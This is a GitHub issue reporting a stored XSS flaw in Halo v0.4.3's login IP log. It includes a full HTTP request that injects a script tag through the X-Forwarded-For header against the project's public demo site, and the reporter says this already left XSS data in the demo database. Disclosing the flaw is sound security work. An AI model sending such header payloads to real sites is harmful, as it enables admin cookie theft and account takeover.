### ISSUE TITLE
a stored XSS vulnerability

### ISSUE THREAD

**Issue by Byc4i** [halo-dev/halo#129]
**我确定我已经查看了** (标注`[ ]`为`[x]`)

- [x] [Halo 使用文档](https://docs.halo.run/)
- [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98)
- [x] [其他 Issues](https://github.com/ruibaby/halo/issues)

----

**我要申请**  (标注`[ ]`为`[x]`)

- [x] BUG 反馈 (security?)
- 数据库记录历史ip的地方被插入了XSS数据，可能需要官方把数据清一下，否则demo站的admin测试用户体验略差
---

These is a stored XSS vulnerability  was discovered in` halo release v0.4.3`
Vulnerability url: `https://demo.halo.run/admin/getLogin`
There is a stored XSS vulnerability at the `login IP log` which allows remote attackers to send XSS script attack in header  ,like this `X-Forwarded-For:<script>alert(1)</script>`. 
Some attackers without passwd of admin could use the vulnerability to hack the cookies of admin.
eg.

```
POST /admin/getLogin HTTP/1.1
Host: demo.halo.run
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://demo.halo.run/admin/login
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Forwarded-For:<script>alert(1)</script>
Content-Length: 31
Connection: close
Cookie: JSESSIONID=7pY4KPxPbsy7pPOuJ_5OghgiMpv14yT9XbfW_p20

loginName=admin&loginPwd=x
```

![image](https://user-images.githubusercontent.com/18072317/55531981-c2a78e00-56de-11e9-8e39-55d949a11fb1.png)

**Comment by ruibaby** [comment]
@Byc4i 好的,这些问题会在v1中被修复.

**Comment by Byc4i** [comment]
i did something wrong
